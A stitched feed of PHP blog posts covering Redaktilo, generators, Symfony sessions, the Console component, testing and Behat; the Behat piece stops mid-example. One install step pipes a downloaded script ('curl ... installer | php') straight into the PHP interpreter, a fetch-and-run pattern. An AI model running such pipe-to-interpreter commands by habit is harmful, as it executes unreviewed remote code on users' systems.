public function exists($filename);
public function write(File $file);
}
It creates instances of File and writes their content into the actual files.
Developers should only use the Editor class: it's a facade which provides the
text editor metaphor:
<?php
namespace Gnugat\Redaktilo;
class Editor
{
// Filesystem operations.
public function open($filename, $force = false);
public function save(File $file);
// Line insertion.
public function addBefore(File $file, $add);
public function addAfter(File $file, $add);
// Content navigation.
public function jumpDownTo(File $file, $line);
public function jumpUpTo(File $file, $line);
}
And that's it. I told you it was a small and simple library ;) . Now let's see what's planned for the next releases.
There's still some search logic left in Editor.
To remove it, a whole system will be put in place: SearchEngineCollection will
be called by Editor and will ask its SearchEngines if they support the
pattern.
This should allow many search strategies. You could then have an extension point!
Some extra logic is also left in File, regarding the conversion of the
content into an array of lines.
ContentConverter could take a file and convert its content into anything, for
example an array of IndentedLine objects. This would allow new types of
SearchEngine, and maybe the creation of ContentEditor, which would bear the
single responsibility of inserting, replacing or removing bits of content.
I'd like to hear about more use cases: what would you do with Redaktilo? What would you like to do with it?
You can open issues to start discussions, just make sure to provide a real life use case ;) .
Redaktilo provides an Object Oriented way to manipulate files, through the editor metaphor.
In PHP >= 5.5, a function containing yield returns an instance of the
Generator class, which acts
like an iterator.
Each yield occurrence marks a position. Calling next will move from the
current yield to the next one.
Thanks to the send method, the Generator class also acts as a coroutine:
you can send the value to be returned by the current yield occurrence.
A Generator function cannot return a value.
class Generator
{
public function current(); // The yielded value.
public function key();
public function valid(); // Whether the generator is still open.
public function next(); // Resumes execution.
public function rewind();
public function send($value); // Sends the value to be returned by the current yield, and resumes execution.
public function throw(Exception $e); // Replaces the current yield with `throw $e;`
}
function direct_generator()
{
yield 1;
yield 'index' => 2;
}
$generator = direct_generator();
echo $generator->current(); // outputs 1
$generator->next();
echo $generator->current(); // outputs 2
echo $generator->key(); // outputs index
The foreach loop internally calls current, key, next and valid methods:
function xrange($start, $end)
{
$value = $start;
while ($value <= $end) {
yield $value;
$value++;
}
}
foreach(xrange(1, 2) as $value) {
echo $value; // outputs 1, then 2.
}
Calling the send method is like replacing the current yield with the given
value.
function holy_grail_countdown($number)
{
while (0 < $number) {
$reset = (yield $number);
$number = $reset ?: $number - 1;
}
}
$c = holy_grail_countdown(5);
foreach ($c as $number) {
echo "$number\n"; // outputs 5, then 2 and finally 1.
if (5 === $number) {
$c->send(3);
}
}
I first encountered generators and coroutines in Python a long time ago, but never really grasped their utility.
It's only recently that I've found some articles describing useful use cases, so I'm just going to share them with you:
Another helpful resource is PHP's RFC, which I find clearer than the actual documentation.
Generators allow you to pause the execution of a function and resume back to where it stopped. Coroutines allow you to send a value while resuming back to it!
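Both halves of that sentence fit in a few lines. The logger below is a hypothetical example: each send() resumes the paused function, which keeps its local state ($count) across resumes.

```php
<?php
// Minimal coroutine sketch: the generator pauses at each yield and
// receives the value passed to send(), while $count survives between calls.
function logger()
{
    $count = 0;
    while (true) {
        $line = yield;
        $count++;
        echo "$count: $line\n";
    }
}

$log = logger();
$log->current();       // run up to the first yield (prime the coroutine)
$log->send('started'); // outputs "1: started"
$log->send('done');    // outputs "2: done"
```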
If you have any comments or questions, feel free to notify me on Twitter.
Reference: This article is intended to be as complete as possible and is kept up to date.
Last reviewed: 22/02/2016.
TL;DR: jump to the conclusion.
The Symfony HttpFoundation component
is a library which provides an Object Oriented implementation of the HTTP
protocol: it wraps PHP's variable superglobals ($_POST, $_GET, $_SERVER,
etc) inside objects (Request, Response, Session, etc).
The idea behind it: web applications should receive a Request and return a Response.
In this article, we'll focus on the Session management which solves many issues (for example the PHP session already started error nightmare).
This introduction will show you how to use it in a "non-symfony" project:
In almost all cases, you'll only deal with the following three methods of the
Session object:
<?php
namespace Symfony\Component\HttpFoundation\Session;
use Symfony\Component\HttpFoundation\Session\SessionBagInterface;
class Session implements SessionInterface, \IteratorAggregate, \Countable
{
public function registerBag(SessionBagInterface $bag);
public function start();
public function getBag($name);
}
A Bag is a group of attributes stored in the session. Again, in most cases
you'll only deal with the following four methods of the AttributeBag object:
<?php
namespace Symfony\Component\HttpFoundation\Session\Attribute;
class AttributeBag implements AttributeBagInterface, \IteratorAggregate, \Countable
{
public function __construct($storageKey = '_sf2_attributes');
public function setName($name);
public function get($name, $default = null);
public function set($name, $value);
}
When using the sessions, you'll generally need to bootstrap things up as follows:
<?php
$session = new Session();
$myAttributeBag = new AttributeBag('my_storage_key');
$myAttributeBag->setName('some_descriptive_name');
$session->registerBag($myAttributeBag);
$session->start();
The session MUST be started by Symfony, and it SHOULD be started after the bag registrations.
Here are some code samples to make things clear.
Let's assume that our session looks like this:
<?php
$_SESSION = array(
'user' => array(
'first_name' => 'Arthur',
'last_name' => 'Dent',
),
);
Here's the bootstrap code we need:
<?php
$session = new Session();
$userAttributeBag = new AttributeBag('user');
$session->registerBag($userAttributeBag);
$session->start();
The equivalent to:
<?php
$firstName = 'Ford';
if (isset($_SESSION['user']['first_name'])) {
$firstName = $_SESSION['user']['first_name'];
}
$_SESSION['user']['last_name'] = 'Prefect';
Would be:
<?php
$userAttributeBag = $session->getBag('user');
$firstName = $userAttributeBag->get('first_name', 'Ford');
$userAttributeBag->set('last_name', 'Prefect');
Now, let's assume we have a session which has deep attributes:
<?php
$_SESSION = array(
'authentication' => array(
'tokens' => array(
'github' => 'A45E96F',
'twitter' => '11AEBC980D456E4EF',
),
),
);
Here's the bootstrap code we need:
<?php
$session = new Session();
$authenticationAttributeBag = new NamespacedAttributeBag('authentication');
$session->registerBag($authenticationAttributeBag);
$session->start();
The equivalent to:
<?php
$_SESSION['authentication']['tokens']['github'] = 'AEB558F02C3B346';
Would be:
<?php
$authenticationAttributeBag = $session->getBag('authentication');
$authenticationAttributeBag->set('tokens/github', 'AEB558F02C3B346');
The Session has been designed to contain a group of attribute bags. But when
working with legacy sessions, you might have to access attributes which are
located at the root of the session. Here's how to extend the Session to allow
this.
A root attribute might look like:
<?php
$_SESSION = array(
'attribute' => 'value',
);
You need to create your own kind of Bag:
<?php
namespace Acme\Session;
use Symfony\Component\HttpFoundation\Session\SessionBagInterface;
class RootAttributeBag implements SessionBagInterface
{
private $name = 'single_attribute';
/** @var string */
private $storageKey;
/** @var mixed */
private $attribute;
public function __construct($storageKey)
{
$this->storageKey = $storageKey;
}
/** {@inheritdoc} */
public function getName()
{
return $this->name;
}
public function setName($name)
{
$this->name = $name;
}
/** {@inheritdoc} */
public function initialize(array &$array)
{
$attribute = !empty($array) ? $array[0] : null;
$this->attribute = &$attribute;
}
/** {@inheritdoc} */
public function getStorageKey()
{
return $this->storageKey;
}
/** {@inheritdoc} */
public function clear()
{
$this->attribute = null;
}
public function get()
{
return $this->attribute;
}
public function set($value)
{
$this->attribute = $value;
}
}
The storage key will be directly the attribute's key.
We also need to hack a Storage class which supports our Bag:
<?php
namespace Acme\Session;
use Symfony\Component\HttpFoundation\Session\Storage\NativeSessionStorage;
class LegacySessionStorage extends NativeSessionStorage
{
/** {@inheritdoc} */
protected function loadSession(array &$session = null)
{
if (null === $session) {
$session = &$_SESSION;
}
$bags = array_merge($this->bags, array($this->metadataBag));
foreach ($bags as $bag) {
$key = $bag->getStorageKey();
// We cast $_SESSION[$key] to an array, because of the SessionBagInterface::initialize() signature
$session[$key] = isset($session[$key]) ? (array) $session[$key] : array();
$bag->initialize($session[$key]);
}
$this->started = true;
$this->closed = false;
}
}
Finally, we'll need the following bootstrap code:
<?php
use Acme\Session\LegacySessionStorage;
use Acme\Session\RootAttributeBag;
use Symfony\Component\HttpFoundation\Session\Session;
$sessionStorage = new LegacySessionStorage();
$session = new Session($sessionStorage);
// before: $_SESSION['attribute']
$legacyBag = new RootAttributeBag('attribute');
$legacyBag->setName('legacy');
// after: $session->getBag('legacy')->get()
$session->registerBag($legacyBag);
The official documentation provides useful information about how to use the session. For example, it explains how to manage flash messages.
It also explains how the session works behind the scenes, with useful tips on how to store the session in a database.
Some cookbooks are also available. You can find, for instance, one describing how to use a session proxy, which is useful if you want to encrypt the session data or make it read-only.
The most common problems encountered are due to the session being started before Symfony2 starts it.
To fix this, check in your php.ini that the session.auto_start option is set
to 0 (its default value).
If the session isn't auto started, it means that the application is starting the
session itself. If you cannot prevent this, use
PhpBridgeSessionStorage
with
NativeFileSessionHandler:
<?php
use Symfony\Component\HttpFoundation\Session\Session;
use Symfony\Component\HttpFoundation\Session\Storage\Handler\NativeFileSessionHandler;
use Symfony\Component\HttpFoundation\Session\Storage\PhpBridgeSessionStorage;
$sessionHandler = new NativeFileSessionHandler();
$sessionStorage = new PhpBridgeSessionStorage($sessionHandler);
$session = new Session($sessionStorage);
Another problem you can encounter: you register some bags but they're always
empty, even though $_SESSION contains the targeted values.
This happens because you registered your bags after starting the session: if you
can't do otherwise, simply call $session->migrate() after your bag
registration; this will reload the values.
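As a short sketch of that fix (assuming the $sessionStorage and $legacyBag objects built in the previous snippets of this article):

```php
<?php
use Symfony\Component\HttpFoundation\Session\Session;

// Hypothetical illustration: $sessionStorage and $legacyBag come from
// the snippets shown earlier in this article.
$session = new Session($sessionStorage);
$session->start();                 // the session is started first...
$session->registerBag($legacyBag); // ...so this bag was not loaded
$session->migrate();               // reloads $_SESSION values into the bags
```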
Finally, when doing AJAX requests you might notice slow performance, or non-persistence of the data. This might be caused by a session locking mechanism, which can be solved by manually saving the session:
<?php
$session->save();
// session_write_close(); // Only required before Symfony 2.1
By wrapping $_SESSION and session_*() functions, Session allows you to
make your code more testable
(you can mock it)
and to solve starting session issues (just make sure to be the first to start
it).
It's divided into AttributeBags, which are arrays of parameters: this allows you
to organize your session by namespaces.
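For instance (a minimal sketch using the default bag; the attribute name is illustrative):

```php
<?php
use Symfony\Component\HttpFoundation\Session\Session;

$session = new Session();
$session->start();

// Attributes live in the default AttributeBag, tucked away
// under its own key instead of polluting $_SESSION's root:
$session->set('user_id', 42);
$userId = $session->get('user_id'); // 42
```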
I hope you found some useful tips in this article, if you have any comments or questions don't be shy and drop me a line on Twitter.
]]>The Pomodoro Technique® helps you to manage your time in order to become more efficient with the following schema:
All you need is a pomodoro timer (I use tomate on Ubuntu), and a strong will to avoid distractions.
Breaks have been proven to improve productivity and mental well-being. By taking them regularly, you should be fresh from Monday morning to Friday afternoon!
One of the points in the Pomodoro technique is to avoid any disturbance. But when working in a team you cannot ignore your teammates for 25 minutes: what if they're stuck and need your help?
You can use it for any type of work. Just keep in mind that breaks should completely cut you off from your work: if you're a developer, then you should walk away from the computer (do some physical exercise, or have a non work related talk with your colleagues).
Have 4 work sessions of 25 minutes, interspersed with 3 break sessions of 5 minutes. Then have a 20-minute break, and start again!
This will help you to stay focused the whole day while preventing burnout.
I hope you found this article interesting. If you have any comments or questions, don't be shy and drop me a line on Twitter ;) .
]]>Deprecated: This article has been re-written - see The Ultimate Developer Guide to Symfony - Console
TL;DR: jump to the conclusion.
Symfony2 is a set of libraries which help you in your everyday tasks. You can even stack them together and create a framework with it:
Many frameworks already use a lot of components from Symfony2:
In this article, we'll see the Console Component, which allows you to build Command Line Interface (CLI) applications. Symfony 2.5 will be released in May 2014, with great new features for the Console, so I'll speak about this version here.
This component allows you to focus on one thing: creating commands. It takes care of all the coloring output, input gathering and command containing stuff.
The big picture is: you have an Application which contains a set of
Commands. When run, the Application will create an Input object which
contains Options and Arguments provided by the user, and will feed it to
the right Command.
The code being the best documentation, we'll now see the strict minimum classes you should know, with the methods you'll likely use.
All you need to know about the Application is this:
<?php
namespace Symfony\Component\Console;
use Symfony\Component\Console\Command\Command;
use Symfony\Component\Console\Input\InputInterface;
use Symfony\Component\Console\Output\OutputInterface;
class Application
{
public function __construct($name = 'UNKNOWN', $version = 'UNKNOWN');
public function add(Command $command);
public function setDefaultCommand($commandName); // New in 2.5!
public function run(InputInterface $input = null, OutputInterface $output = null);
}
Minimum usage:
#!/usr/bin/env php
<?php
use Symfony\Component\Console\Application;
$application = new Application();
$application->run();
By running this script, you should be able to see a colorful output which lists
the available commands (list is the default command, and a help is also
available).
The Command class is the controller of your CLI application:
<?php
namespace Symfony\Component\Console\Command;
use Symfony\Component\Console\Input\InputArgument;
use Symfony\Component\Console\Input\InputInterface;
use Symfony\Component\Console\Input\InputOption;
use Symfony\Component\Console\Output\OutputInterface;
class Command
{
protected function configure();
protected function execute(InputInterface $input, OutputInterface $output);
protected function interact(InputInterface $input, OutputInterface $output);
// To be called in configure
public function setName($name);
public function addArgument($name, $mode = null, $description = '', $default = null);
public function addOption($name, $shortcut = null, $mode = null, $description = '', $default = null);
public function setDescription($description);
public function setHelp($help);
public function setAliases($aliases);
}
Basically you create a class which extends Command. You need to implement 2 methods:
- configure: the configuration of the command's name, arguments, options, etc
- execute: where you process the input, call your services and write to the output
The interact method is called before the execute one: it allows you to ask questions to the user to set more input arguments and options.
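To illustrate those two methods, here's a minimal command (a hypothetical hello:world example, not taken from the component itself):

```php
<?php
use Symfony\Component\Console\Command\Command;
use Symfony\Component\Console\Input\InputArgument;
use Symfony\Component\Console\Input\InputInterface;
use Symfony\Component\Console\Output\OutputInterface;

class HelloWorldCommand extends Command
{
    protected function configure()
    {
        // Declare the command's name and its input
        $this->setName('hello:world');
        $this->setDescription('Greets the given name');
        $this->addArgument('name', InputArgument::REQUIRED);
    }

    protected function execute(InputInterface $input, OutputInterface $output)
    {
        // Process the input and write to the output
        $output->writeln(sprintf('Hello %s!', $input->getArgument('name')));
    }
}
```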
Here's my stand on arguments and options modes:
- an argument should always be required (InputArgument::REQUIRED)
- an option should be a simple flag (InputOption::VALUE_NONE)
- if an option needs a value, make it required (InputOption::VALUE_REQUIRED), and don't forget to provide a default one
The container of the arguments and options given by the user:
<?php
namespace Symfony\Component\Console\Input;
interface InputInterface
{
public function getArgument($name);
public function getOption($name);
}
The Application validates a part of the input: it checks if the command
actually accepts the given arguments and options (is the value required? Does
the hello:world command have a --yell option? etc), but you still need to
validate the input against your business rules (the --number option should
be an integer, the name argument should be escaped to avoid SQL injection,
etc).
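For example, the business validation can live at the top of execute (a sketch with a hypothetical --number option; the command name is illustrative):

```php
<?php
use Symfony\Component\Console\Command\Command;
use Symfony\Component\Console\Input\InputInterface;
use Symfony\Component\Console\Input\InputOption;
use Symfony\Component\Console\Output\OutputInterface;

class RepeatCommand extends Command
{
    protected function configure()
    {
        $this->setName('repeat');
        $this->addOption('number', null, InputOption::VALUE_REQUIRED, '', '1');
    }

    protected function execute(InputInterface $input, OutputInterface $output)
    {
        $number = $input->getOption('number');
        // The Application checked that --number has a value,
        // but only we can check that this value is an integer.
        if (!ctype_digit($number)) {
            $output->writeln('<error>The --number option should be an integer</error>');

            return 1; // a non-zero exit code signals a failure
        }
        $output->writeln(str_repeat('*', (int) $number));
    }
}
```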
A convenient object which allows you to write on the console output:
<?php
namespace Symfony\Component\Console\Output;
abstract class Output implements OutputInterface
{
public function writeln($messages, $type = self::OUTPUT_NORMAL);
}
The writeln method allows you to write a line (a newline character is appended
at the end). If the given message is an array, it will print each element on a
new line.
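For example (a minimal sketch, assuming $output is an OutputInterface instance received in execute):

```php
<?php
// A single line, newline appended automatically:
$output->writeln('Single line');

// An array: each element is printed on its own line:
$output->writeln(array(
    'First line',
    'Second line',
));
```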
The tags allow you to color some parts:
- green, for informative messages (<info>foo</info>)
- yellow, for comments (<comment>foo</comment>)
- black on cyan, for questions (<question>foo</question>)
- white on red, for errors (<error>foo</error>)
Another brand new class from the version 2.5:
<?php
namespace Symfony\Component\Console\Logger;
use Psr\Log\AbstractLogger;
use Symfony\Component\Console\Output\OutputInterface;
class ConsoleLogger extends AbstractLogger
{
public function __construct(
OutputInterface $output,
array $verbosityLevelMap = array(),
array $formatLevelMap = array()
);
public function log($level, $message, array $context = array());
}
As you can see, it uses the OutputInterface provided by the Application.
You should inject this logger into your services, this will allow them to write
messages on the standard output of the console while keeping them decoupled from
this component (so you can use these services in a web environment).
Oh, and the good news is: it colors the output and decides whether or not to
print it depending on the verbosity and log level! An error message will
always be printed in red, while an informative message will only be printed
(in green) if you pass the -vv option.
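A sketch of wiring it up with a custom verbosity map (the PSR-3 LogLevel constants come from the psr/log package; the mapping shown is an illustrative assumption):

```php
<?php
use Psr\Log\LogLevel;
use Symfony\Component\Console\Logger\ConsoleLogger;
use Symfony\Component\Console\Output\ConsoleOutput;
use Symfony\Component\Console\Output\OutputInterface;

$output = new ConsoleOutput();
// Print notices even without any -v flag:
$logger = new ConsoleLogger($output, array(
    LogLevel::NOTICE => OutputInterface::VERBOSITY_NORMAL,
));
$logger->notice('Created file {file}', array('file' => '/tmp/LICENSE'));
```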
Just like any other component, the Console can be used as a standalone library.
In this example, we'll create a tool which will create a LICENSE file, just
like fossil (the bootstrapper of markdown files for your FOSS projects).
To begin, let's install the component using Composer:
$ curl -sS https://getcomposer.org/installer | php # Downloading composer
$ ./composer.phar require "symfony/console:~2.5@dev"
Then create an empty application:
#!/usr/bin/env php
<?php
// File: fossil
require __DIR__.'/vendor/autoload.php';
use Symfony\Component\Console\Application;
$application = new Application('Fossil', '2.0.0');
$application->run();
Our command has two arguments: the author and the year.
It can also take the path of the project as an option (we'll provide the current directory as default value).
Let's create it:
<?php
// File: src/Gnugat/Fossil/LicenseCommand.php
namespace Gnugat\Fossil;
use Symfony\Component\Console\Command\Command;
use Symfony\Component\Console\Input\InputArgument;
use Symfony\Component\Console\Input\InputOption;
use Symfony\Component\Console\Input\InputInterface;
use Symfony\Component\Console\Output\OutputInterface;
class LicenseCommand extends Command
{
protected function configure()
{
$this->setName('license');
$this->setDescription('Bootstraps the license file of your project');
$this->addArgument('author', InputArgument::REQUIRED);
$this->addArgument('year', InputArgument::REQUIRED);
$this->addOption('path', 'p', InputOption::VALUE_REQUIRED, '', getcwd());
}
protected function execute(InputInterface $input, OutputInterface $output)
{
}
}
Our command doesn't do anything yet, but we can already register it in our application:
#!/usr/bin/env php
<?php
// File: fossil
require __DIR__.'/vendor/autoload.php';
use Symfony\Component\Console\Application;
use Gnugat\Fossil\LicenseCommand;
$command = new LicenseCommand();
$application = new Application('Fossil', '2.0.0');
$application->add($command);
$application->run();
In order for it to run, you'll need to register the namespace in the autoloader
by editing the composer.json file at the root of the project:
{
"require": {
"symfony/console": "~2.5@dev"
},
"autoload": {
"psr-4": { "": "src" }
}
}
Then you need to run ./composer.phar update to update the configuration.
In fossil, templates
are retrieved using the
Finder component, their
values are replaced using Twig and written using the
Filesystem component.
In order to keep this article short, we'll:
- hardcode the LICENSE template in the command
- replace the templating by a simple implode
This means that you have to install the new component:
$ ./composer.phar require "symfony/filesystem:~2.4"
And then you need to fill the execute method:
<?php
// File: src/Gnugat/Fossil/LicenseCommand.php
namespace Gnugat\Fossil;
use Symfony\Component\Console\Command\Command;
use Symfony\Component\Console\Input\InputInterface;
use Symfony\Component\Console\Output\OutputInterface;
use Symfony\Component\Filesystem\Filesystem;
class LicenseCommand extends Command
{
// configure method...
protected function execute(InputInterface $input, OutputInterface $output)
{
$path = $input->getOption('path').'/LICENSE';
$license = implode(' ', array(
'Copyright (c)',
$input->getArgument('author'),
$input->getArgument('year'),
));
$filesystem = new Filesystem();
$filesystem->dumpFile($path, $license.PHP_EOL);
$output->writeln(sprintf('Created the file %s', $path));
}
}
Now running ./fossil license "Loïc Chardonnet" "2013-2014" -p="/tmp" will
output the message "Created the file /tmp/LICENSE", which should be what really
happened.
I'm not a big fan of putting logic in my commands, so generally I use services to do the actual job:
<?php
// File src/Gnugat/Fossil/DocumentationWriter.php
namespace Gnugat\Fossil;
use Symfony\Component\Filesystem\Filesystem;
use Psr\Log\LoggerInterface;
class DocumentationWriter
{
private $filesystem;
private $logger;
public function __construct(Filesystem $filesystem, LoggerInterface $logger)
{
$this->filesystem = $filesystem;
$this->logger = $logger;
}
public function write($path, $content)
{
$this->filesystem->dumpFile($path, $content);
$this->logger->notice(sprintf('Created file %s', $path));
}
}
As you can see, the DocumentationWriter isn't very big. It might seem
overkill, but now it's easy to write tests which will check if the LICENSE
file has been created. Also, in fossil the class does a bit more work: it
checks if the file already exists, and takes a "force overwrite" option into
account.
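Such a test could look like this (a sketch using PHPUnit's mocking API of that era; the test class and expectations are assumptions based on the DocumentationWriter shown above):

```php
<?php
use Gnugat\Fossil\DocumentationWriter;

class DocumentationWriterTest extends \PHPUnit_Framework_TestCase
{
    public function testItWritesTheFileAndLogsIt()
    {
        // Test doubles isolate the writer from the real filesystem
        $filesystem = $this->getMock('Symfony\Component\Filesystem\Filesystem');
        $logger = $this->getMock('Psr\Log\LoggerInterface');

        $filesystem->expects($this->once())
            ->method('dumpFile')
            ->with('/tmp/LICENSE', 'Copyright (c)');
        $logger->expects($this->once())
            ->method('notice');

        $writer = new DocumentationWriter($filesystem, $logger);
        $writer->write('/tmp/LICENSE', 'Copyright (c)');
    }
}
```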
You'll also notice that we inject a logger to notify the user of what happens. We need to install the PSR-3 logger interface:
$ composer require "psr/log:~1.0"
Our command will now be much thinner, just like any controller should be (MVC can also be applied in CLI):
<?php
// File: src/Gnugat/Fossil/LicenseCommand.php
namespace Gnugat\Fossil;
use Gnugat\Fossil\DocumentationWriter;
use Symfony\Component\Console\Command\Command;
use Symfony\Component\Console\Input\InputInterface;
use Symfony\Component\Console\Logger\ConsoleLogger;
use Symfony\Component\Console\Output\OutputInterface;
use Symfony\Component\Filesystem\Filesystem;
class LicenseCommand extends Command
{
// configure method...
protected function execute(InputInterface $input, OutputInterface $output)
{
$path = $input->getOption('path').'/LICENSE';
$license = implode(' ', array(
'Copyright (c)',
$input->getArgument('author'),
$input->getArgument('year'),
));
$filesystem = new Filesystem();
$logger = new ConsoleLogger($output);
$documentationWriter = new DocumentationWriter($filesystem, $logger);
$documentationWriter->write($path, $license.PHP_EOL);
}
}
To be fair, our command is longer. But it is thinner, as it now has fewer responsibilities.
If you run ./fossil license "Loïc Chardonnet" "2013-2014" -p="/tmp" again,
you won't see anything: ConsoleLogger hides informative messages by default.
You need to pass the verbose option to see the message:
$ ./fossil license -v "Loïc Chardonnet" "2013-2014" -p="/tmp"
The dependency creation isn't a responsibility a controller should have. We'll delegate this to the Dependency Injection component:
$ ./composer.phar require "symfony/dependency-injection:~2.4"
We'll also install the Config component:
$ ./composer.phar require "symfony/config:~2.4"
If you don't know yet this component, go read this helpful article.
We'll create a XML file to configure the registration of our services:
<?xml version="1.0" ?>
<!-- File: config/services.xml -->
<container xmlns="http://symfony.com/schema/dic/services"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://symfony.com/schema/dic/services http://symfony.com/schema/dic/services/services-1.0.xsd">
<services>
<service id="symfony.application"
class="Symfony\Component\Console\Application">
<argument key="name">Fossil</argument>
<argument key="version">2.0.0</argument>
<call method="add">
<argument type="service" id="fossil.license_command" />
</call>
</service>
<service id="fossil.license_command" class="Gnugat\Fossil\LicenseCommand">
<argument type="service" id="fossil.documentation_writer" />
</service>
<service id="fossil.documentation_writer" class="Gnugat\Fossil\DocumentationWriter">
<argument type="service" id="symfony.filesystem" />
<argument type="service" id="symfony.console_logger" />
</service>
<service id="symfony.filesystem" class="Symfony\Component\Filesystem\Filesystem">
</service>
<service id="symfony.console_logger" class="Symfony\Component\Console\Logger\ConsoleLogger">
<argument type="service" id="symfony.console_output" />
</service>
<service id="symfony.console_output"
class="Symfony\Component\Console\Output\ConsoleOutput">
</service>
</services>
</container>
As you can see, I've delegated every construction to the DIC (Dependency Injection Container), even the construction of the application. Now the command looks like this:
<?php
// File: src/Gnugat/Fossil/LicenseCommand.php
namespace Gnugat\Fossil;
use Gnugat\Fossil\DocumentationWriter;
use Symfony\Component\Console\Command\Command;
use Symfony\Component\Console\Input\InputArgument;
use Symfony\Component\Console\Input\InputOption;
use Symfony\Component\Console\Input\InputInterface;
use Symfony\Component\Console\Output\OutputInterface;
class LicenseCommand extends Command
{
private $documentationWriter;
public function __construct(DocumentationWriter $documentationWriter)
{
$this->documentationWriter = $documentationWriter;
parent::__construct();
}
protected function configure()
{
$this->setName('license');
$this->setDescription('Bootstraps the license file of your project');
$this->addArgument('author', InputArgument::REQUIRED);
$this->addArgument('year', InputArgument::REQUIRED);
$this->addOption('path', 'p', InputOption::VALUE_REQUIRED, '', getcwd());
}
protected function execute(InputInterface $input, OutputInterface $output)
{
$path = $input->getOption('path').'/LICENSE';
$license = implode(' ', array(
'Copyright (c)',
$input->getArgument('author'),
$input->getArgument('year'),
));
$this->documentationWriter->write($path, $license.PHP_EOL);
}
}
And the console now contains the DIC initialization:
#!/usr/bin/env php
<?php
// File: fossil
use Symfony\Component\Config\FileLocator;
use Symfony\Component\DependencyInjection\ContainerBuilder;
use Symfony\Component\DependencyInjection\Loader\XmlFileLoader;
require __DIR__.'/vendor/autoload.php';
$container = new ContainerBuilder();
$loader = new XmlFileLoader($container, new FileLocator(__DIR__.'/config'));
$loader->load('services.xml');
$output = $container->get('symfony.console_output');
$application = $container->get('symfony.application');
$application->run(null, $output);
And voilà! You now know how to create CLI applications :) .
The Console component allows you to create CLI applications. The commands are a thin layer which gathers the input and call services. Those services can then output messages to the user using a special kind of logger.
Although this article was a bit long, I might have missed something here, so if you have any feedback or questions, be sure to contact me on Twitter.
]]>This article concludes the series on Tests:
In each article, I've tried to include as much general information as possible, along with references to blogs which could help you go further. In this final post, I'll regroup those references and the conclusions.
A test is a way to check if something behaves correctly. This something is called a System Under Test (SUT) and can be:
Generally, you proceed as follows:
When doing unit tests, you'll need to isolate your SUT from its collaborators (the dependencies, the other classes used by it). To do so, you'll need test doubles and Dependency Injection.
Frameworks can help you to automate your tests. You'll generally find these tools:
Note: xUnit frameworks allow many kinds of tests (they're not limited to unit tests).
Note: WebDriver is an API for Selenium, a Java server which allows you to interact with a browser.
A process in which:
This allows you to naturally have a 100% test coverage, and it has the side effect of making your code more decoupled (you need your code to be decoupled in order to test it).
About writing the code as quickly as possible, committing any sins:
BDD is divided into two sections: spec and story. It comes from the lack of direction in TDD and introduces the concept of business value.
Behat and phpspec automate the process by allowing you to:
Automated tests allow you to make sure your system isn't full of bugs, and help you detect any regressions.
There are many kinds out there: you can test what the user sees, what the computer sees and what the product owner expects.
I'd be really glad if this cheat sheet was of some use to you. If you have any comments, you can contact me on Twitter :) .
I received great feedback about the Behat article, triggered by the following statement: "if you're using Mink or Selenium, then you're doing it wrong". Let me re-phrase that.
If you're using Selenium or Mink, then you're doing integration tests, not behavior ones. Those tools are fine: the UI is what the user sees and interacts with, so it's important to make sure it isn't broken.
What isn't fine is to use Behat with these tools and then to say that you're doing BDD. Use the right tools for the job: PHPUnit can perfectly be used with selenium, and libraries like webdriver allow you to work with selenium without using Behat.
One of the questions raised was: "If I can't interact with the UI, how do I test the behavior of my application?" Well, there are many ways and the answer deserves a whole article or even a whole series! I'll just give you the douchebag (it's the actual application name, I mean no offense!) example:
Inner conclusion: make a distinction between integration (HTML, UI, etc) and Behavior (business value, acceptance criteria from user stories) tests. If you can't do both, then the choice is yours: which one is the most important to you?
]]>This article is part of a series on Tests in general and on how to practice them:
Story Behavior Driven Development (BDD) is all about making a user story's acceptance criteria executable. In this article we'll go over Behat, a PHP framework which enables you to do so.
In a nutshell, Behat reads your user stories and links each step in the acceptance criteria to a function. The execution of those functions will then ascertain whether the acceptance criteria succeeded.
To be able to read the user story, Behat needs you to write it in a specific format.
By default, your user stories are located as follow: /features/*.feature.
They're written using the Gherkin language,
which looks like this:
Feature: <user story title>
In order to <business value to attain>
As a/an <actor>
I need to <requirements to meet>
Scenario: <acceptance criteria title>
Given <precondition>
When <event>
Then <outcome>
The first lines will be printed while executing the acceptance criteria. The
Scenario keyword starts a new criteria. The Given, When and Then
keywords will trigger a search for a related test method. Those are called
steps.
Your criteria will most likely have more than three lines. You can use And and
But keywords to link the steps:
Feature: <user story title>
In order to <business value to attain>
As a/an <actor>
I need to <requirements to meet>
Scenario: <acceptance criteria title>
Given <precondition>
And <another precondition>
When <event>
But <another event>
Then <outcome>
And <another outcome>
But <yet another outcome>
Note: to be fair, the Given, When, Then, But and And keywords aren't
treated differently by Behat: the choice is there for you, in order to make your
acceptance criteria more readable.
The test methods should be placed in a context: /features/bootstrap/FeatureContext.php.
It looks like this:
<?php
use Behat\Behat\Context\BehatContext;
class FeatureContext extends BehatContext
{
/**
* @Given /^a sentence from an acceptance criteria$/
*/
public function aTestMethod()
{
// Your test code.
}
}
When Behat reads your user stories, for each step it will look in your context
and check the test method's annotations (comments starting with @Given, @When
or @Then) to see if it matches.
Note: again, @Given, @When and @Then don't really matter. If you write
Given I am an imp in your user story, and then write a test method with the
annotation @When /^I am an imp$/, it will match!
As you can see, a regexp is used for the matching, but since version 3.0 (still a release candidate at the time I write this article) you can use plain text with placeholders:
/**
* @Given I am an/a :type
*/
public function setType($type)
{
// Your test code.
}
This has been borrowed from Turnip.
Note: your test method name can be anything, it doesn't have to match the step sentence.
When a test method is executed, it can have one of the following states:
To set the pending state, write the following in your method:
throw new \Behat\Behat\Tester\Exception\Pending();
As you can see, if you write the test method but put nothing in it, then the test will succeed. The responsibility to make the success state match business expectations is yours.
Behat eats its own dog food: its tests are written with itself! Which means you can have a look at them to inspire yourself. You'll see something that isn't written in the documentation: you can use PHPUnit's assertion methods to make your test pass or fail.
Remember how phpspec generates your code based on your specifications? Well it's the same thing with Behat.
First Bootstrap your context:
behat --init
Write a /features/<user-story>.feature file.
Next run the tests. For the pending steps, Behat will propose template code which can be copy/pasted into your test methods:
behat
Then complete your test methods.
And finally run your tests:
behat
The tests should all fail. Which means now you can start writing the code to make them pass: it's Behavior Driven Development, remember? ;)
A lot of people hate Behat because it's slow and it needs Selenium to work, which isn't easy to install (if a novice can't install it, then it's not easy). Oh, and they hate it because the tests written with it aren't maintainable.
Guess what? They're wrong. They're probably using the mink extension, which enables you to write things like:
Feature: User registration
In order to gain access to the website
As a user
I need to register
Scenario: Giving account details
Given I fill the field "#username" with "John"
And I fill the field "#password" with "Doe"
